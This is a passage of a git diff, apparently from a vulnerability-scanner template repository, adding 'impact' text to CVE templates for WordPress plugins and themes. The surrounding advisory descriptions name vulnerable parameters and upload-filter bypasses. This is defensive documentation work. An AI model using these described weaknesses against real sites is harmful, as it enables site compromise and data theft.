plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. + impact: | + This vulnerability can lead to remote code execution and compromise the affected WordPress site. remediation: | Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index c1241ceb60..485cc456c4 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index a1ce3a566d..7f9a4d5b42 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the victim. remediation: Fixed in version 3.7.0.1. reference: - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34 diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index d9810e8d46..3e81336504 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index a5c60f4bc9..f346dad260 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 5859613a95..e87afe1047 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 226854055d..ed91134b93 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 842ae5ba1b..5310170d43 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -5,6 +5,8 @@ info: author: 2rs3c severity: high description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. + impact: | + Attackers can exploit this vulnerability to perform actions on behalf of authenticated users, leading to potential data breaches or unauthorized access. remediation: | Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index c26b8abaf6..f2e774d47e 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website. remediation: | Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index d9d99e9036..a9fcd308b2 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -5,6 +5,8 @@ info: author: ShreyaPohekar severity: critical description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script. reference: diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 737f6bdc1a..23fb7837a3 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.3.2. reference: - https://www.exploit-db.com/exploits/50349 diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 113674866d..236279563e 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 02aa67a1a6..17fb9ae140 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress Photo Gallery by 10Web to version 1.5.69 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 4068a35d34..b0f5b50fdd 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index eff25ca295..e069f8a040 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 322261952e..f32ff25e68 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Mediumish Theme plugin (1.0.47 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 381ff3bfae..0320005b82 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update WordPress Bello Directory & Listing Theme to version 1.6.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index a087310d9c..3275e63239 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1ff5552100..560ac41b80 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index ad79aa05bd..f5328ce5ca 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site. remediation: Fixed in version 4.22. reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index d118a8e04d..e35bfac8f4 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 55358d010a..0e893967ce 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue. + impact: | + This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities. remediation: | Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 08591d9593..bc451f341a 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 9d4649c4b3..b5cc0531f7 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication. + impact: | + Attackers can upload malicious files and execute arbitrary code on the target system. remediation: | Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 81f3eed5fa..71111671ce 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress Pro Real Estate 7 Theme to version 3.1.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 187413d81f..8678c1443d 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress FoodBakery plugin to version 2.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 13e4224a21..267d828848 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. remediation: | Update wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index f6146e8edd..ccd0c02909 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the Jannah Theme to version 5.4.5 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 5761488ed3..c5c722a2df 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking. remediation: Fixed in version 2.8 reference: - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 56ba97a03f..67aa2ba230 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8 diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 7362d34711..7f1e1213ec 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.4. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 712b9d1556..088db52cd2 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.5. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 5abf4d473b..0b1361497d 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. + impact: | + Remote File Inclusion/Server-Side Request Forgery vulnerability allows an attacker to include arbitrary files or make requests to internal resources, leading to potential data leakage, unauthorized access. remediation: | Update Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 2769ad2dad..4ddb79d2c2 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages, + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index afad38054a..b748e0839d 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -5,6 +5,8 @@ info: author: johnjhacking severity: medium description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 67f2bc1d76..628a74e02e 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -5,6 +5,8 @@ info: author: suman_kar severity: medium description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index 4efaefc3fe..7a378ef1be 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the Workreap plugin to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index c694b6fe92..15a5e660de 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation. reference: diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index fbc6e0dfe0..590dc8b9da 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index bfbd04e335..312b988379 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + impact: | + An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information. remediation: Fixed in version 3.7.1.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-24647 diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index ede35685d7..9c6ed4cbdd 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index ab3241ca72..31c5b2eaae 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment 